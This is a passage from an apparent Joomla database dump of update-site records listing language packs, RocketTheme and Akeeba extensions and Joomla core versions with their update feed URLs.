US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(20145,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(20146,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(20147,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(20148,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(20149,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(20150,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(20151,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(20152,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(20153,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(20154,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(20155,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(20156,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(20157,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(20158,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(20159,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(20160,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(20161,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(20162,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(20163,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(20164,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(20165,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(20166,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(20167,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(20168,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(20169,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(20170,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(20171,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(20172,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(20173,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(20174,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(20175,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(20176,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(20177,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(20178,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(20179,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(20180,57,0,'French','','pkg_fr-FR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(20181,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(20182,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(20183,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(20184,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(20185,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(20186,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(20187,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(20188,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(20189,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(20190,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(20191,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(20192,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(20193,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(20194,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(20195,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(20196,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(20197,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(20198,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(20199,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(20200,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(20201,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(20202,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(20203,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(20204,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(20205,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(20206,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(20207,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(20208,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(20209,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(20210,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(20211,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(20212,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(20213,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(20214,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(20215,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(20216,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(20217,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(20218,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(20219,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(20220,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(20221,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(20222,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(20223,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(20224,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(20225,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(20226,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(20227,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(20228,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(20229,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(20230,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(20231,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(20232,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(20233,57,0,'French','','pkg_fr-FR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(20234,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(20235,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(20236,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(20237,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(20238,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(20239,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(20240,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(20241,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(20242,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(20243,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(20244,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(20245,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(20246,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(20247,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(20248,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(20249,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(20250,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(20251,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(20252,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(20253,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(20254,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(20255,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(20256,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(20257,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(20258,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(20259,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(20260,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(20261,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(20262,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(20263,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(20264,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(20265,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(20266,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(20267,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(20268,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(20269,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(20270,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(20271,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(20272,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(20273,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(20274,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(20275,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(20276,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(20277,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(20278,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(20279,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(20280,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(20281,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(20282,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(20283,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(20284,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(20285,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(20286,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(20287,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(20288,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(20289,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(20290,3,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(20291,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(20292,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(20293,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(20294,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(20295,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(20296,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(20297,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(20298,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(20299,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(20300,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(20301,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(20302,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(20303,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(20304,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(20305,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(20306,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(20307,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(20308,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(20309,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(20310,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(20311,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(20312,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(20313,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(20314,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(20315,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(20316,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(20317,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(20318,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(20319,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(20320,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(20321,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(20322,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(20323,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(20324,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(20325,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(20326,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(20327,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(20328,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(20329,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(20330,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(20331,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(20332,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(20333,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(20334,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(20335,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(20336,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(20337,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(20338,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(20339,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(20340,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(20341,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(20342,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(20343,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(20344,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(20345,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(20346,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(20347,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(20348,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(20349,57,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(20350,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(20351,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(20352,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(20353,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(20354,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(20355,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(20356,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(20357,57,0,'Chinese 